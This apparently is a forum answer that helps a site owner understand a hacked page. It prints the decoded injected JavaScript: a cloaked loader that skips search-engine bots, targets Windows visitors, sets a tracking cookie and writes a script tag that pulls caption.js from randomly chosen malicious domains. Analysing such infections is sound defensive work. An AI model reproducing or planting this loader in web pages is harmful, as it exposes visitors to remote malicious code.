How could you have done this on your own? URLDecode + jsbeautifier or jsunpack are more than enough to get this far ;)
Use "Version Control" so this doesn't happen in the future. After a good build is completed, and everything is the way you want it, save it to an external hard drive while you are offline.
Did you recently do something to upset a coworker who is a programmer?
Used php function rawurldecode
<script language="javascript" type="text/javascript">
var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion;
if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){
var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],e=["vagi.","vain.","vale.","vars.","vary.","vasa.","vaut.","vavs.","viny.","viol.","vrow.","vugs.","vuln."],f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length);
dt=new Date;
dt.setTime(dt.getTime()+9072E4);
document.cookie="holycookie="+escape("holycookie")+";expires="+dt.toGMTString()+";path=/";
document.write('<script type="text/javascript" src="http://'+e[g]+d[f]+'/system/caption.js"><\/script>')};
</script>

Categories

Resources